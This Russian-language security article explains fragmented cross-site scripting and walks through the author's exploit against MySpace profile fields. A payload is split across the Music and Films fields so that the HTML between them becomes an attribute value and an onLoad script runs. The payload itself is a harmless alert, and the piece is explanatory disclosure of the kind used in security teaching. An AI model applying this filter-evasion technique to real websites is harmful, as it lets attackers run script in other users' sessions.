Введение

На простом уровне объяснение
фрагментированной атаки довольно просто -
несколько фрагментов, самих по себе
безопасных и способных пройти фильтры или
файрволы, при достижении цели собираются в
единое целое, которое уже несет в себе
угрозу. Фрагментированные атаки обычно
применяются на сетевом/сессионном уровне -
для обхода систем обнаружения вторжения и
файрволов, однако могут применяться и для
более простых нападений, например
межсайтового скриптинга, в документах
которые собираются из частей и
предоставляются пользователю.

XSS фрагментация

Такой тип атак довольно редок из-за того,
что требуется несколько полей ввода,
отображающихся на одной странице, при этом
для всех должен применяться один и тот же
фильтр, который бы пропускал безопасные
части скрипта. Другое требование -
достаточная глупость или кривость фильтра,
он не должен вырезать символы < и > и в то
же время допускать строки там, где их быть
не должно. Например <body onload="alert('XSS');">
может обрезаться, а body onload="alert('XSS');" уже
быть доступным для использования. 

Глобальная идея фрагментации остается прежней - расположить сами по себе не опасные части скрипта в опасных местах. Простейшее такое
место - внутри другого тега.

MySpace 0day эксплоит

Свой пример фрагментированной XSS атаки я
разработал для сайта MySpace. 

Для начала немного теории. В профиле
имеется несколько полей для описания
собственной персоны - интересы, любимые
фильмы и т.п. Возьмем секцию интересов,
Музыку и Фильмы. В реале получаемый код
выглядит так:

<tr id=MusicRow>
<td valign="top" align="left" width="100" bgcolor="#b1d0f0">
<span class="lightbluetext8">Music</span>
</td>
<td id="ProfileMusic" width="175" bgcolor="#d5e8fb" style="WORD-WRAP: break-word">Music Goes Here!</td>
</tr>
<script language="JavaScript">highlightInterests("ProfileMusic");</script>
<tr id=FilmsRow>
<td valign="top" align="left" width="100" bgcolor="#b1d0f0">
<span class="lightbluetext8">Films</span>
</td>
<td id="ProfileFilms" width="175" bgcolor="#d5e8fb" style="WORD-WRAP: break-word">Films Go Here!</td>
</tr>

Очевидно, что разделяет два
пользовательских поля лишь этот код:

</span>
</td>
<td id="ProfileMusic" width="175" bgcolor="#d5e8fb"
style="WORD-WRAP: break-word">Music Goes Here!</td>
</tr>
<script language="JavaScript">highlightInterests("ProfileMusic");
</script>
<tr id=FilmsRow>
<td valign="top" align="left" width="100"
bgcolor="#b1d0f0">
<span class="lightbluetext8">Films</span>
</td>
<td id="ProfileFilms" width="175" bgcolor="#d5e8fb"
style="WORD-WRAP: break-word">

Интересная его особенность заключается в
том, что в нем нет ни одной одинарной
кавычки, лишь стандартные двойные.

Конечно же мы можем сделать что-нибудь для
инкапсулирования этого текста:

<tr id=MusicRow>
<td valign="top" align="left" width="100" bgcolor="#b1d0f0">
<span class="lightbluetext8">Music</span>
</td>
<td id="ProfileMusic" width="175" bgcolor="#d5e8fb" style="WORD-WRAP:
break-word">
<body test='
</td>
</tr>
<script language="JavaScript">highlightInterests("ProfileMusic");
</script>
<tr id=FilmsRow><td valign="top" align="left" width="100" bgcolor="#b1d0f0">
<span class="lightbluetext8">Films</span>
</td>
<td id="ProfileFilms" width="175" bgcolor="#d5e8fb" style="WORD-WRAP:
break-word">
'>Films Go Here!
</td></tr>

Как вы видите, мы просто заключили этот
текст в параметр text тега body! Теперь мы можем
написать требуемый скрипт во втором
поле  - на требуемой нам опасной позиции! 

Следовательно, если мы сделаем параметр
Films таким:

' onLoad="alert('XSS');"></body>

то мы и получим реальную возможность
выполнить произвольный сценарий в
контексте уязвимого сайта.

Именно такая атака использовалась для
взлома MySpace. Я полагаю, что ее аналоги могут
работать на множестве других сайтов, где
пользовательский ввод делиться и
разрешаются теговые скобки.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии